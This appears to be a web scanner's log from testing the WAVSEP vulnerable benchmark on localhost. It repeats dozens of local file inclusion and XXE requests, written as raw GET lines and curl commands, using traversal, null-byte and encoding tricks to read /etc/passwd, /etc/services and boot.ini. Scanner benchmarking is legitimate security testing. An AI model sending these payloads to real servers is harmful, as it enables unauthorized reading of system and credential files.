GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
